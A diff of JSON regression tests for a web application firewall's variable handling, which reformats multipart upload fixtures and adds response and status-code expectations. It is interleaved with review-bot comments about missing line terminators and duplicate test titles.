@@ -1149,38 +1532,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,5v5,11t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,5v5,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/file\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
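Review bot: The `REQUEST_FILENAME` tests keep their `body` entries without line terminators while `Content-Length` is raised to `501`, which is the `516` of the `REQUEST_BODY_LENGTH` test minus its fifteen `\n` characters. If the harness concatenates the array entries verbatim, as that arithmetic suggests, these requests carry a multipart body with no line breaks, so with `SecRequestBodyAccess On` and `"http_code": 200` they pass only as long as the parser tolerates a body it cannot split into parts. Terminating each entry as the sibling tests do, e.g. `"Content-Disposition: form-data; name=\"name\"\n",`, and recomputing `Content-Length` would keep these fixtures well-formed; the expected offsets appear to refer to the URI, so they should not move, but that needs confirming. The same applies to the hunks at -1198 and -1786 (`Content-Length` `605`); the test objects start and end outside this hunk.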
@@ -1198,38 +1590,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 3", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -1247,483 +1648,573 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "518", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, 
+ "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,4v306,4t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "error_log": "o0,4v306,4t:trim", + "http_code": 200 + }, + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - 
"----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "615", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,5v402,5t:trim" + "expected": { + "error_log": "o0,5v402,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - 
"ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; 
name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v680,20t:trim" + "expected": { + "error_log": "o0,16v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - 
"----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v512,20t:trim" + "expected": { + "error_log": "o0,16v512,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file1\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_NAMES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", 
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_NAMES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: 
form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_NAMES \"(fiasdfasdfledata|filedata)\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 1", + "client": { + "ip": "200.249.12.31", + 
"port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"v560,32t:trim" + "expected": { + "error_log": "v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:filedata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - 
"method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", 
+ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:fiasdfasdfledata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_COMBINED_SIZE", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_COMBINED_SIZE", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + 
"Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_COMBINED_SIZE \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - 
"Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o8,7v754,38t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + 
}, + "expected": { + "error_log": "o8,7v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
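Review bot: Two tests in this hunk carry the same `"title": "Variable offset - FILES"` although they differ in rule (`small_text_file2` vs `small_text_file1`) and in expected offset (`v680,20` vs `v512,20`), so a failure report that names the title does not say which of the two failed. Numbering them the way the neighbouring tests are numbered, `"title": "Variable offset - FILES 1"` and `"title": "Variable offset - FILES 2"`, keeps them apart. Whether the harness keys or filters results on the title is not visible here, so check that no lookup depends on the current string before renaming.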
@@ -1731,54 +2222,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", 